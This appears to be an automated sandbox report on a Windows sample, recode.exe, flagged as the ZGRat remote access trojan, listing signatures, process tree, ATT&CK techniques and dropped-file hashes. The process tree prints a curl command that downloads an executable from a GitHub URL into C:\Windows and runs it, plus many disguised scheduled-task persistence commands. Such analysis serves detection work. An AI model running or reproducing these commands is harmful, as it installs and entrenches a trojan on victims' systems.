Analysis
-
max time kernel
150s -
max time network
152s -
platform
windows10-2004_x64 -
resource
win10v2004-20240508-en -
resource tags
-
submitted
09-05-2024 00:37
General
-
Target
recode.exe
-
Size
1.4MB
-
MD5
d120c8ac26de487f2809b3e672b1a8ac
-
SHA1
1e044ddbdaf5d57d96d754bedbdec93d7dc3a58f
-
SHA256
ee12a9f44c284d944c681ef8060eba2d0c4f3c4209d78a5e231e107b5baf891d
-
SHA512
35447c00f9d553fe983097745b4301f285d6660fc5c4427190a89bd97bcace39f398ecf1c9fd63ac25da082d6c27bcb42db5118b91a1cbb163f24111309425e6
-
SSDEEP
24576:r0tR5MWdGgsLVbk1hRh7N9UnMuGKFGRQ93HX1sU:39lkHJCnpKU
Malware Config
Signatures
-
Detect ZGRat V1 3 IoCs
-
Modifies WinLogon for persistence 2 TTPs 6 IoCs
-
Process spawned unexpected child process 18 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
-
ZGRat
ZGRat is remote access trojan written in C#.
-
Downloads MZ/PE file
-
Checks computer location settings 2 TTPs 3 IoCs
Looks up country code configured in the registry, likely geofence.
-
Executes dropped EXE 3 IoCs
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Adds Run key to start application 2 TTPs 12 IoCs
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
-
Drops file in System32 directory 5 IoCs
-
Drops file in Windows directory 3 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 18 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Modifies registry class 2 IoCs
-
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 2 IoCs
-
Suspicious use of WriteProcessMemory 37 IoCs
-
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\recode.exe"C:\Users\Admin\AppData\Local\Temp\recode.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c curl https://raw.githubusercontent.com/Vexigg/Fortnite-External-Source-WIth-Prediction/main/External%20With%20Prediction/build/kdmapper_release.exe --output C:\\Windows\\Update.exe >nul 2>&1 && C:\\Windows\\Update.exe2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\curl.execurl https://raw.githubusercontent.com/Vexigg/Fortnite-External-Source-WIth-Prediction/main/External%20With%20Prediction/build/kdmapper_release.exe --output C:\\Windows\\Update.exe3⤵
- Drops file in Windows directory
-
-
C:\Windows\Update.exeC:\\Windows\\Update.exe3⤵
- Checks computer location settings
- Executes dropped EXE
- Modifies registry class
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\winDll\dvRjBY2gn5BdU0m188kftpzkLyn9BEtcDHYwrpjSKECMFQBg1aJgT7zLqR.vbe"4⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\winDll\CxFFIHB78YecKNtwzXg7GlmZVa2MlUcDrXLO7T7iYWa.bat" "5⤵
- Suspicious use of WriteProcessMemory
-
C:\winDll\mscom.exe"C:\winDll/mscom.exe"6⤵
- Modifies WinLogon for persistence
- Checks computer location settings
- Executes dropped EXE
- Adds Run key to start application
- Drops file in System32 directory
- Drops file in Windows directory
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\g3gcz24x\g3gcz24x.cmdline"7⤵
- Drops file in System32 directory
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA95F.tmp" "c:\Windows\System32\CSC571ED5F388984C10ABE0F6F7DF8FA868.TMP"8⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\Gg6jaq7Wol.bat"7⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\chcp.comchcp 650018⤵
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost8⤵
- Runs ping.exe
-
-
C:\winDll\OfficeClickToRun.exe"C:\winDll\OfficeClickToRun.exe"8⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
-
-
-
-
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\recode.exe" MD5 | find /i /v "md5" | find /i /v "certutil"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\certutil.execertutil -hashfile "C:\Users\Admin\AppData\Local\Temp\recode.exe" MD53⤵
-
-
C:\Windows\system32\find.exefind /i /v "md5"3⤵
-
-
C:\Windows\system32\find.exefind /i /v "certutil"3⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c cls2⤵
-
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "OfficeClickToRunO" /sc MINUTE /mo 9 /tr "'C:\winDll\OfficeClickToRun.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "OfficeClickToRun" /sc ONLOGON /tr "'C:\winDll\OfficeClickToRun.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "OfficeClickToRunO" /sc MINUTE /mo 14 /tr "'C:\winDll\OfficeClickToRun.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "TextInputHostT" /sc MINUTE /mo 12 /tr "'C:\Windows\apppatch\CustomSDB\TextInputHost.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "TextInputHost" /sc ONLOGON /tr "'C:\Windows\apppatch\CustomSDB\TextInputHost.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "TextInputHostT" /sc MINUTE /mo 7 /tr "'C:\Windows\apppatch\CustomSDB\TextInputHost.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "lsassl" /sc MINUTE /mo 7 /tr "'C:\winDll\lsass.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "lsass" /sc ONLOGON /tr "'C:\winDll\lsass.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "lsassl" /sc MINUTE /mo 5 /tr "'C:\winDll\lsass.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 8 /tr "'C:\winDll\RuntimeBroker.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\winDll\RuntimeBroker.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 11 /tr "'C:\winDll\RuntimeBroker.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "mscomm" /sc MINUTE /mo 13 /tr "'C:\Windows\SysWOW64\MailContactsCalendarSync\mscom.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "mscom" /sc ONLOGON /tr "'C:\Windows\SysWOW64\MailContactsCalendarSync\mscom.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "mscomm" /sc MINUTE /mo 9 /tr "'C:\Windows\SysWOW64\MailContactsCalendarSync\mscom.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "mscomm" /sc MINUTE /mo 8 /tr "'C:\winDll\mscom.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "mscom" /sc ONLOGON /tr "'C:\winDll\mscom.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "mscomm" /sc MINUTE /mo 7 /tr "'C:\winDll\mscom.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
1Winlogon Helper DLL
1Scheduled Task/Job
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
158B
MD5f67353fc7f8207172879d421a324dfeb
SHA1f90b0c75ff40316f934e52f1d45cd09d234568f5
SHA256494ac84a50314cd95a6973425b60a678fc6af2e5c43ac2435ed3846fce6fb305
SHA512e8e86d355565d56f4dd88382a53d94b68ff47db864186cdc74c7c80020ca7a9f8b6a5339bf4bd4aebc403a96a2eb132cc20520aa6400dc51527b4329efaa4821
-
Filesize
1KB
MD56a822fbbcaa1896cf3dc9cbad6d32d8a
SHA145efd4728c1551be70c92052dc51d502b31bf86f
SHA2560e10f415dcfe0e5e1f6b263ce95acb1cd4f3d1a22c651d8d9cad99d4489b1cbb
SHA512ce4957ad850b57d8cb0fc303e6fef25db8ff3f65c3a6a5fd531225e4fc9c0af00e4a8ce3791be68b767f892307a4ef6054f18fac4d0e5bff6c0fb84afe63563a
-
Filesize
2.1MB
MD572231a8ed8d833a291feb278d86bc798
SHA118315e4aa31384696304b95f88a7ea87f7601d6e
SHA256792d3970408d1f8cac7ddc3bc58975c6c849a1c3a29369ecf5b7c9f3fd722367
SHA5125c79cc6e7dc2495d5dd1eee0219b6aa69cf70be524038fa612c616c5fd699c4b52323bc8808d0339fa642e85296654beecfc7b619882b0d626561ec95e3a548f
-
Filesize
56B
MD54339221fd2a51e9f92858fac8115dee5
SHA1c21911039b8ba8e070f6b0c00c4933b8a6851fd6
SHA256c21249336067cb7e84f727efe271e6dea9d98b3bcaf27a4e84e5ef84e8b572fd
SHA5128bda1b257391b97b7d53ea212883bae7276ed69448afcbd193ebf70e0a9a125e7949b51b56e6b63ae6d6c446a1dff60d2a51c797ebc0f74614f239aaf0ffd6f2
-
Filesize
228B
MD5afa6698f846bdab7fb1deac4298a858b
SHA15f6e916dadacf1596e9c70b0a05c21f1443c60cd
SHA256a31c4cf2ffd97fbca535f31d8c21c945f97390e636f1123ba501ded6f36e5294
SHA512d5ad0be67740b61bb006118636d94882979a6171bcae97397e4b796451be23a531adc64eb67a333b53da45d87bf997327f6d253db1698a6d8dcc1029c330c51d
-
Filesize
1.8MB
MD5818c63bcb9ed71f7d2824d691a0a7973
SHA135c0e698cf9d64d3553977b9f08054edf8669715
SHA2560d2cd06f09ff7b28399b4544a2f63eda91321a2aaf514d5b5bc17d2d01c633b4
SHA512adff7147b442bd6061f55d198137f1123c3c5e6de4a27faccd401028433626a164fe99aa2835ca45542dc6d6dc63a405e2b27aba120033446eb75328d7974f10
-
Filesize
362B
MD5e54c6327c862d6df5d0158d7b2082491
SHA1e9c8713625b9b7feb864907fd92130ccba8ce2cf
SHA256c2266d18c0f06468135c0b9205c9155576292440a75097b4d416b748aa8c08fd
SHA512834112f3971a25253fdaea67b6f980dc7877fb737dc1c180df8fac19849c18b46382889ff27587cfb065531ecf1a461864d5faa042606f4ffd74d8ef2e599993
-
Filesize
235B
MD5bbbfb0187cc5fb3ec0108aa71e1e842f
SHA1c7f8abced8332e03b1f59a6b885d9008d7a7b5ae
SHA256a431654c596c15c678f89f120ef26664ce0a18e36c3a1bda22cba6b417e510a3
SHA512ab2cbadb22613c2f8d7050b59efe770b1217f6b2dbd86e913857949f3a56c7ae95e9ce455f0c966ac062acf4b3d8014a3fa7f8080221ad893f998c542b4718e7
-
Filesize
1KB
MD5d52087709e2274a5a9381789082a9d03
SHA1e1f693bc2b4cd35e7abdea93dc0bb77ef6ddce59
SHA256f4091edfc561d6d16cdb8f686a10ebade8c6a9239730fddb9c652a1c005790c2
SHA5125e448e07b49f301dd1d815818527f88d32cac7e869cd8120651b940783a29a18c2b4ec87ad18ce3a85c6973e4b676d9499068e3b805c972b6a95660a3c7dae12
-
Filesize
96KB
-
Filesize
320KB
-
Filesize
112KB
-
Filesize
56KB
-
Filesize
1.8MB